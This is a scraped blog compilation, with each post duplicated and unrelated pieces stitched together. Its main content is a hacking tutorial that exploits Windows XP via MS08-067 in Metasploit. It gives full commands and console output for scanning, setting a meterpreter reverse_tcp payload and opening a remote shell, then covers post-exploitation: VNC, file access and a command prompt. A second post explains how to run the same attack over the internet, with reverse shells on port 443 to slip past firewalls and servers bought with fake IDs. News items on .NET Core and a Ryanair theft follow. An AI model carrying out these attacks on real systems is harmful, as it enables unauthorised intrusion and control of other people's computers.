Hack windows xp with MS08-067 exploit

Using metasploit its possible to hack windows xp machines just by using the ip address of the victim machine. It does not involve installing any backdoor or trojan server on the victim machine. Metasploit does this by exploiting a vulnerability in windows samba service called ms08-67. This exploit works on windows xp upto version xp sp3.

The vulnerability/exploit module inside metasploit is

The vulnerability/exploit module inside metasploit is

Name: Microsoft Server Service Relative Path Stack Corruption Module: exploit/windows/smb/ms08_067_netapi

Further details and references to the vulnerability can be found at the following pages

http://cvedetails.com/cve/2008-4250/
http://www.osvdb.org/49243
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Note : This exploit is old as of now and will work only if the windows xp on the target machine is unpatched and not running any firewalls. If you were to scan a range of ip addresses to discover online windows xp machines, then most of them would likely be patched ( through automatic updates ).

So if you want to test and practise this exploit, setup a vulnerable unpatched xp system.

Scan for open ports

Before exploiting the xp machine with metasploit it is a good idea to scan for open ports using nmap to confirm that ports are accessible and accepting connections. Here is a quick example

root@kali:~# nmap -n -sV 192.168.1.4

Starting Nmap 6.25 ( http://nmap.org ) at 2013-05-03 06:27 PDT

Nmap scan report for 192.168.1.4

Host is up (0.00051s latency).

Not shown: 996 closed ports

PORT     STATE SERVICE      VERSION

135/tcp  open  msrpc        Microsoft Windows RPC

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds

2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

MAC Address: 08:00:27:D3:2C:37 (Cadmus Computer Systems)

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

Check the port number 445. It is running the microsoft-ds samba service. This service is used to share printers and files across the network. It is this service that is vulnerable to the above mentioned exploit and would be hacked next using metasploit.

Exploit using metasploit

1. The exploit is quite easy to launch. Start msfconsole.

Using notepad to track pentests? Have Metasploit Pro report on hosts,

services, sessions and evidence -- type 'go_pro' to launch it now.

       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]

+ -- --=[ 1059 exploits - 595 auxiliary - 175 post

+ -- --=[ 277 payloads - 29 encoders - 8 nops

msf >

2. Select the exploit with 'use' command.

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >

If you want to read information about the exploit then type 'info' and hit enter.

3. See the options available

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name

   --  ----

   0   Automatic Targeting

msf exploit(ms08_067_netapi) >

The important option to set is the RHOST (Remote Host). This is the ip address of the victim machine that is running the vulnerable windows xp. In this example the ip address is 192.168.1.4
So set the option

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4

RHOST => 192.168.1.4

msf exploit(ms08_067_netapi) >

4. Select the payload

Next comes the payload. Payload is that piece of code that runs along with the exploit and provides the hacker with a reverse shell. We are going to use the windows meterpreter payload. If you want to see all the available payloads then use the 'show payloads' command.

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

Why meterpreter ? Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in. The functionality includes common post exploitation tasks like scanning the target's network, hardware, accessing devices etc. Meterpreter can also start a vnc session.

5. Check options once again

Now that we have selected out payload, its time to check the options once again.

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.1.4      yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Automatic Targeting

msf exploit(ms08_067_netapi) >

Now the options also include the payload options. The important options to set are LHOST and LPORT. The LHOST is the ip address of local machine or hacker machine. The LPORT is the port number on which the reverse shell listener will receive the incoming shell.

So setup the correct values

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33

LHOST => 192.168.1.33

msf exploit(ms08_067_netapi) > set LPORT 6666

LPORT => 6666

msf exploit(ms08_067_netapi) >

6. Launch the exploit

Now metasploit is all configured to launch the exploit. Enter 'exploit' and hit enter.

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.33:6666

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (752128 bytes) to 192.168.1.4

[*] Meterpreter session 2 opened (192.168.1.33:6666 -> 192.168.1.4:1044) at 2013-05-03 03:27:25 -0700

meterpreter >

If it runs correctly you finally get the meterpreter shell. Type in help and hit enter to see what commands are available.

Lets try running some of the common commands.

Post Exploitation with meterpreter

Get system information

The 'sysinfo' command will get the system information of victim machine.

meterpreter > sysinfo

Computer        : ----------

OS              : Windows XP (Build 2600, Service Pack 3).

Architecture    : x86

System Language : en_US

Meterpreter     : x86/win32

meterpreter >

Shows some basic information about the windows installation.

Get network information

The 'ipconfig' command will show the network interfaces and their network configuration.

meterpreter > ipconfig

Interface  1

============

Name         : MS TCP Loopback interface

Hardware MAC : 00:00:00:00:00:00

MTU          : 1520

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

Interface  2

============

Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport

Hardware MAC : 08:00:27:d3:2c:37

MTU          : 1500

IPv4 Address : 192.168.1.4

IPv4 Netmask : 255.255.255.0

Start vnc server

If you want a vnc session on the victim machine then run the vnc script.

meterpreter > run vnc

[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.33 LPORT=4545)

[*] Running payload handler

[*] VNC stager executable 73802 bytes long

[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\rRlmDx.exe (must be deleted manually)

[*] Executing the VNC agent with endpoint 192.168.1.33:4545...

meterpreter >

It takes a few seconds, and then a window will popup with remote desktop on the vicitim machine. Now you can use your mouse to interact with the victim desktop as if it were your own.

Browsing the file system

For browsing the file system there are lots of linux style commands.

Command       Description

    -------       -----------

    cat           Read the contents of a file to the screen

    cd            Change directory

    download      Download a file or directory

    edit          Edit a file

    getlwd        Print local working directory

    getwd         Print working directory

    lcd           Change local working directory

    lpwd          Print local working directory

    ls            List files

    mkdir         Make directory

    pwd           Print working directory

    rm            Delete the specified file

    rmdir         Remove directory

    search        Search for files

    upload        Upload a file or directory

Get native shell

If you finally want the command prompt style shell on the victim machine enter 'shell' and hit enter.

meterpreter > shell

Process 1328 created.

Channel 3 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Now its the windows command prompt. Play around it and when done, type 'exit' and press enter. It will come back to the meterpreter session.

Next

The meterpreter commands shown above were just the basic commands of meterpreter. Meterpreter has lots of inbuilt scripts that can do lots of other things on the victim machine. We shall check them out in some other post.

So keep hacking till then.

Source:- http://www.binarytides.com/hack-windows-xp-metasploit/

ethicalhacking

Hack windows xp with metasploit (tutorial)

Hack windows xp with MS08-067 exploit

Using metasploit its possible to hack windows xp machines just by using the ip address of the victim machine. It does not involve installing any backdoor or trojan server on the victim machine. Metasploit does this by exploiting a vulnerability in windows samba service called ms08-67. This exploit works on windows xp upto version xp sp3.

The vulnerability/exploit module inside metasploit is

The vulnerability/exploit module inside metasploit is

Name: Microsoft Server Service Relative Path Stack Corruption Module: exploit/windows/smb/ms08_067_netapi

Further details and references to the vulnerability can be found at the following pages

http://cvedetails.com/cve/2008-4250/
http://www.osvdb.org/49243
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Note : This exploit is old as of now and will work only if the windows xp on the target machine is unpatched and not running any firewalls. If you were to scan a range of ip addresses to discover online windows xp machines, then most of them would likely be patched ( through automatic updates ).

So if you want to test and practise this exploit, setup a vulnerable unpatched xp system.

Scan for open ports

Before exploiting the xp machine with metasploit it is a good idea to scan for open ports using nmap to confirm that ports are accessible and accepting connections. Here is a quick example

root@kali:~# nmap -n -sV 192.168.1.4

Starting Nmap 6.25 ( http://nmap.org ) at 2013-05-03 06:27 PDT

Nmap scan report for 192.168.1.4

Host is up (0.00051s latency).

Not shown: 996 closed ports

PORT     STATE SERVICE      VERSION

135/tcp  open  msrpc        Microsoft Windows RPC

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds

2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

MAC Address: 08:00:27:D3:2C:37 (Cadmus Computer Systems)

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds

Check the port number 445. It is running the microsoft-ds samba service. This service is used to share printers and files across the network. It is this service that is vulnerable to the above mentioned exploit and would be hacked next using metasploit.

Exploit using metasploit

1. The exploit is quite easy to launch. Start msfconsole.

Using notepad to track pentests? Have Metasploit Pro report on hosts,

services, sessions and evidence -- type 'go_pro' to launch it now.

       =[ metasploit v4.6.0-dev [core:4.6 api:1.0]

+ -- --=[ 1059 exploits - 595 auxiliary - 175 post

+ -- --=[ 277 payloads - 29 encoders - 8 nops

msf >

2. Select the exploit with 'use' command.

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >

If you want to read information about the exploit then type 'info' and hit enter.

3. See the options available

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name

   --  ----

   0   Automatic Targeting

msf exploit(ms08_067_netapi) >

The important option to set is the RHOST (Remote Host). This is the ip address of the victim machine that is running the vulnerable windows xp. In this example the ip address is 192.168.1.4
So set the option

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4

RHOST => 192.168.1.4

msf exploit(ms08_067_netapi) >

4. Select the payload

Next comes the payload. Payload is that piece of code that runs along with the exploit and provides the hacker with a reverse shell. We are going to use the windows meterpreter payload. If you want to see all the available payloads then use the 'show payloads' command.

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

Why meterpreter ? Because meterpreter is a very powerful kind of reverse shell that has lots of functionality already built in. The functionality includes common post exploitation tasks like scanning the target's network, hardware, accessing devices etc. Meterpreter can also start a vnc session.

5. Check options once again

Now that we have selected out payload, its time to check the options once again.

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.1.4      yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name

   --  ----

   0   Automatic Targeting

msf exploit(ms08_067_netapi) >

Now the options also include the payload options. The important options to set are LHOST and LPORT. The LHOST is the ip address of local machine or hacker machine. The LPORT is the port number on which the reverse shell listener will receive the incoming shell.

So setup the correct values

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.33

LHOST => 192.168.1.33

msf exploit(ms08_067_netapi) > set LPORT 6666

LPORT => 6666

msf exploit(ms08_067_netapi) >

6. Launch the exploit

Now metasploit is all configured to launch the exploit. Enter 'exploit' and hit enter.

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.33:6666

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (752128 bytes) to 192.168.1.4

[*] Meterpreter session 2 opened (192.168.1.33:6666 -> 192.168.1.4:1044) at 2013-05-03 03:27:25 -0700

meterpreter >

If it runs correctly you finally get the meterpreter shell. Type in help and hit enter to see what commands are available.

Lets try running some of the common commands.

Post Exploitation with meterpreter

Get system information

The 'sysinfo' command will get the system information of victim machine.

meterpreter > sysinfo

Computer        : ----------

OS              : Windows XP (Build 2600, Service Pack 3).

Architecture    : x86

System Language : en_US

Meterpreter     : x86/win32

meterpreter >

Shows some basic information about the windows installation.

Get network information

The 'ipconfig' command will show the network interfaces and their network configuration.

meterpreter > ipconfig

Interface  1

============

Name         : MS TCP Loopback interface

Hardware MAC : 00:00:00:00:00:00

MTU          : 1520

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

Interface  2

============

Name         : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport

Hardware MAC : 08:00:27:d3:2c:37

MTU          : 1500

IPv4 Address : 192.168.1.4

IPv4 Netmask : 255.255.255.0

Start vnc server

If you want a vnc session on the victim machine then run the vnc script.

meterpreter > run vnc

[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.33 LPORT=4545)

[*] Running payload handler

[*] VNC stager executable 73802 bytes long

[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\rRlmDx.exe (must be deleted manually)

[*] Executing the VNC agent with endpoint 192.168.1.33:4545...

meterpreter >

It takes a few seconds, and then a window will popup with remote desktop on the vicitim machine. Now you can use your mouse to interact with the victim desktop as if it were your own.

Browsing the file system

For browsing the file system there are lots of linux style commands.

Command       Description

    -------       -----------

    cat           Read the contents of a file to the screen

    cd            Change directory

    download      Download a file or directory

    edit          Edit a file

    getlwd        Print local working directory

    getwd         Print working directory

    lcd           Change local working directory

    lpwd          Print local working directory

    ls            List files

    mkdir         Make directory

    pwd           Print working directory

    rm            Delete the specified file

    rmdir         Remove directory

    search        Search for files

    upload        Upload a file or directory

Get native shell

If you finally want the command prompt style shell on the victim machine enter 'shell' and hit enter.

meterpreter > shell

Process 1328 created.

Channel 3 created.

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Now its the windows command prompt. Play around it and when done, type 'exit' and press enter. It will come back to the meterpreter session.

Next

The meterpreter commands shown above were just the basic commands of meterpreter. Meterpreter has lots of inbuilt scripts that can do lots of other things on the victim machine. We shall check them out in some other post.

So keep hacking till then.

Source:- http://www.binarytides.com/hack-windows-xp-metasploit/

Source: TechCrunch

From Last November, Microsoft was teasing its developers by saying that some of the key features for Microsoft .NET platform can show-up on Linux or Mac. Today, at its Build developer Conference in San Francisco, Microsoft officially announced that its first full preview of the Microsoft .NET Core run-time is coming for Linux and Mac OS X from today for developers.

Microsoft’s basic idea to take its Microsoft .NET to other platforms is to build more apps or leverage more developers towards it and create a huge ecosystem for its core platform. Microsoft also launched the Microsoft .NET Foundation last year.

I am shocked that Microsoft took this step to come in open source world by commencing their core platform to other operating systems. But from last few years, the company has made quite a few contributions to open source projects.

The company had already open-sourced the Roslyn .NET Compiler platform, but now the full preview of the .NET Core run-time will be available for the Linux and Mac OS X.

Mono work and community has been working with Microsoft for past few years now to make this cross platform a successful open source project for both companies to make a greater ecosystem. Both groups have exchanged a “tremendous amount” of ideas and code in this period to fulfill Microsoft’s dream to take the .NET development to open source, and make a beneficial crossover for Microsoft .NET between different operating system.

The Microsoft .NET Core platform is made of several components like the managed compilers, the run-time, the Base class library and the application model, such as ASP.NET and many more. Even the windows Store 8.1 and Windows Phone 8.1 platforms are much smaller subsets of the Microsoft .NET Framework. However, they all are a small subset of Microsoft .NET Core. So this open source project range could be called limitless for the regular users.

Download here: .NET Core Runtime Preview from GitHub

Click here for all the announcement made at today’s Build Conference by Microsoft.

Source:-  http://fossbytes.com/microsoft-launches-net-core-preview-for-linux-and-mac-users/

techupdate

Microsoft Launches .NET Core Preview For Linux and Mac Users.

Source: TechCrunch

From Last November, Microsoft was teasing its developers by saying that some of the key features for Microsoft .NET platform can show-up on Linux or Mac. Today, at its Build developer Conference in San Francisco, Microsoft officially announced that its first full preview of the Microsoft .NET Core run-time is coming for Linux and Mac OS X from today for developers.

Microsoft’s basic idea to take its Microsoft .NET to other platforms is to build more apps or leverage more developers towards it and create a huge ecosystem for its core platform. Microsoft also launched the Microsoft .NET Foundation last year.

I am shocked that Microsoft took this step to come in open source world by commencing their core platform to other operating systems. But from last few years, the company has made quite a few contributions to open source projects.

The company had already open-sourced the Roslyn .NET Compiler platform, but now the full preview of the .NET Core run-time will be available for the Linux and Mac OS X.

Mono work and community has been working with Microsoft for past few years now to make this cross platform a successful open source project for both companies to make a greater ecosystem. Both groups have exchanged a “tremendous amount” of ideas and code in this period to fulfill Microsoft’s dream to take the .NET development to open source, and make a beneficial crossover for Microsoft .NET between different operating system.

The Microsoft .NET Core platform is made of several components like the managed compilers, the run-time, the Base class library and the application model, such as ASP.NET and many more. Even the windows Store 8.1 and Windows Phone 8.1 platforms are much smaller subsets of the Microsoft .NET Framework. However, they all are a small subset of Microsoft .NET Core. So this open source project range could be called limitless for the regular users.

Download here: .NET Core Runtime Preview from GitHub

Click here for all the announcement made at today’s Build Conference by Microsoft.

Source:-  http://fossbytes.com/microsoft-launches-net-core-preview-for-linux-and-mac-users/

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network  .

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)

2. Dedicated Server

3. Cloud Server(I haven't try this  ) e.g : Amazon

4. Internet With Public IP

5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY) 

2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.

3. Cloud server –> I haven't trying this…maybe someone can share 

4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.

5. Control router by ourselves to redirect incoming connection or outgoing connection.

Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :

Information(Attacker) :

– Attacker1 use local IP address –> 192.168.8.8

– Attacker1 have public IP address –> 73.67.123.85

– Attacker1 can control his router to redirect any incoming/outgoing traffic.

– Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.

Information(Victim) :

– Victim1 have local IP address –> 192.168.1.2

– Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection

– Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website

TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS

etc(you can scan it first but be careful).

From the information above, usually attacker can create some payload and options like this :

set payload windows/meterpreter/reverse_tcp

set lhost 73.67.123.85

set lport 443

When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.

You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding 

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows)

Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….

Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.

You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise 

Hope you found it useful.

Source:-hacking-tutorial

ethicalhacking

How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic

A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network  .

Requirement :

1. Virtual Private Server. For Backtrack 5 already installed VPS, you can view here (but you also can install yourself)

2. Dedicated Server

3. Cloud Server(I haven't try this  ) e.g : Amazon

4. Internet With Public IP

5. You can control router by yourself

Step-By-Step How to do Hacking the Internet(WAN) Not LAN Using Metasploit – The Logic:

1. Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY) 

2. Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.

3. Cloud server –> I haven't trying this…maybe someone can share 

4. You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.

5. Control router by ourselves to redirect incoming connection or outgoing connection.

Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) :

Information(Attacker) :

– Attacker1 use local IP address –> 192.168.8.8

– Attacker1 have public IP address –> 73.67.123.85

– Attacker1 can control his router to redirect any incoming/outgoing traffic.

– Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.

Information(Victim) :

– Victim1 have local IP address –> 192.168.1.2

– Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection

– Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack? :

Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1). AFAIK they usually open specific port like :

TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website

TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS

etc(you can scan it first but be careful).

From the information above, usually attacker can create some payload and options like this :

set payload windows/meterpreter/reverse_tcp

set lhost 73.67.123.85

set lport 443

When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.

You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding 

Update :

If you use Windows machine as a router, you can read about port forwarding tutorial here(How to do port forwarding in Windows)

Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….

Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.

You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise 

Hope you found it useful.

Source:-hacking-tutorial

Chinese Hackers managed to steal $5 million (£3.25 million) from Ryanair’s Chinese bank account using electronic fund transfer.

The controversial Ryanair has fallen victim to a gang of Chinese hackers who successfully robbed $5 million (£3.25 million) from its account in one of the Chinese banks. The hacking which is believed to have happened  last week, the fraudsters were able to carry out the scam by using fraudulent electronic transfer through a Chinese bank.

As per the reports from “The Irish Times” it is not yet clear as to how was it carried out other than a Chinese hackers gang is suspected to be behind it.

The reports further said that it has been observed that Ryanair uses dollars to buy the fuel for its huge fleet of Boeing 737 aircrafts which comes to around 400 plus in number. Definitely large amounts of funds are used from these accounts to buy the fuel. Hence, when €4.6 million was transferred from the account, the officials did not find anything unusual and hence no alarm was raised. It seems that hackers presumably hacked these funds which were saved for the fuel.

Now, whether it is a routine followed by Ryanair to use the Chinese banks for the fuel payment is something yet to be discovered, however it seems that the hackers got access to the funds through one of the Chinese bank accounts.

Ryanair, is a Dublin based low cost airline run by Michael O’Leary. The criminal scam popped up only last Friday, now Ryanair has asked the CAB (Criminal Assets Bureau) in Dublin to help them recover the hacked funds.

On Tuesday, the airline confirmed the news by this statement: “Ryanair confirms that it has investigated a fraudulent electronic transfer via a Chinese bank last week.” Further, no details of how the scam took place has been revealed in public as the matter is now subject to legal proceedings however the airline said that it has taken certain preventive steps to curb any further re-occurrence of such scams.

Ryanair’s statement: “The airline has been working with its banks and the relevant authorities and understands that the funds – less than $5 million – have now been frozen. The airline expects these funds to be repaid shortly, and has taken steps to ensure that this type of transfer cannot recur.”

As of now, the CAB is using its connections with similar agencies in Asia to trace the money so as to help the airline secure its recovery.

The Irish bureau is a part of the Camden Assets Recovery Inter agency Network and its equivalent network for the Asia Pacific is the Asset Recovery Interagency Network Asia Pacific which is based in Korea.

In the first week of April, IBM security researchers had identified and published an active criminal campaign “The Dyre Wolf campaign” and here the hackers successfully stole  more than $ 1 million from some of the targeted businesses. Basically, the computers of the employees were infected by some malware that tricked them to connect to a live phone operator who was part of the hacker’s gang who would then manipulate the credentials and wire huge amount of funds from the business accounts.

Well, nevertheless, it is definitely a big blow to a company if its business accounts are hacked for such a huge amount. Though the fraud came into light only on Friday, Ryanair is definitely engaged in its extensive search to secure and recover the money.

We can understand for security reasons it must have not revealed the exact search procedure and methods that the hackers used to hack such a huge amount.  However, once the funds are recovered hopefully Ryanair will disclose on the details of how hackers hacked the accounts, how the airline caught this hack and also what preventive measures can be taken to help stop any such hacks from occurring in future, basically this will help other corporate companies from the preventing themselves from these probable hackers.

Source:-  http://www.techworm.net/2015/04/chinese-hackers-gang-steals-5-million-from-ryanairs-chinese-bank-account.html

techupdate

Chinese hackers gang steals $5 million from Ryanair’s Chinese bank account

Chinese Hackers managed to steal $5 million (£3.25 million) from Ryanair’s Chinese bank account using electronic fund transfer.

The controversial Ryanair has fallen victim to a gang of Chinese hackers who successfully robbed $5 million (£3.25 million) from its account in one of the Chinese banks. The hacking which is believed to have happened  last week, the fraudsters were able to carry out the scam by using fraudulent electronic transfer through a Chinese bank.

As per the reports from “The Irish Times” it is not yet clear as to how was it carried out other than a Chinese hackers gang is suspected to be behind it.

The reports further said that it has been observed that Ryanair uses dollars to buy the fuel for its huge fleet of Boeing 737 aircrafts which comes to around 400 plus in number. Definitely large amounts of funds are used from these accounts to buy the fuel. Hence, when €4.6 million was transferred from the account, the officials did not find anything unusual and hence no alarm was raised. It seems that hackers presumably hacked these funds which were saved for the fuel.

Now, whether it is a routine followed by Ryanair to use the Chinese banks for the fuel payment is something yet to be discovered, however it seems that the hackers got access to the funds through one of the Chinese bank accounts.

Ryanair, is a Dublin based low cost airline run by Michael O’Leary. The criminal scam popped up only last Friday, now Ryanair has asked the CAB (Criminal Assets Bureau) in Dublin to help them recover the hacked funds.

On Tuesday, the airline confirmed the news by this statement: “Ryanair confirms that it has investigated a fraudulent electronic transfer via a Chinese bank last week.” Further, no details of how the scam took place has been revealed in public as the matter is now subject to legal proceedings however the airline said that it has taken certain preventive steps to curb any further re-occurrence of such scams.

Ryanair’s statement: “The airline has been working with its banks and the relevant authorities and understands that the funds – less than $5 million – have now been frozen. The airline expects these funds to be repaid shortly, and has taken steps to ensure that this type of transfer cannot recur.”

As of now, the CAB is using its connections with similar agencies in Asia to trace the money so as to help the airline secure its recovery.

The Irish bureau is a part of the Camden Assets Recovery Inter agency Network and its equivalent network for the Asia Pacific is the Asset Recovery Interagency Network Asia Pacific which is based in Korea.

In the first week of April, IBM security researchers had identified and published an active criminal campaign “The Dyre Wolf campaign” and here the hackers successfully stole  more than $ 1 million from some of the targeted businesses. Basically, the computers of the employees were infected by some malware that tricked them to connect to a live phone operator who was part of the hacker’s gang who would then manipulate the credentials and wire huge amount of funds from the business accounts.

Well, nevertheless, it is definitely a big blow to a company if its business accounts are hacked for such a huge amount. Though the fraud came into light only on Friday, Ryanair is definitely engaged in its extensive search to secure and recover the money.

We can understand for security reasons it must have not revealed the exact search procedure and methods that the hackers used to hack such a huge amount.  However, once the funds are recovered hopefully Ryanair will disclose on the details of how hackers hacked the accounts, how the airline caught this hack and also what preventive measures can be taken to help stop any such hacks from occurring in future, basically this will help other corporate companies from the preventing themselves from these probable hackers.

Source:-  http://www.techworm.net/2015/04/chinese-hackers-gang-steals-5-million-from-ryanairs-chinese-bank-account.html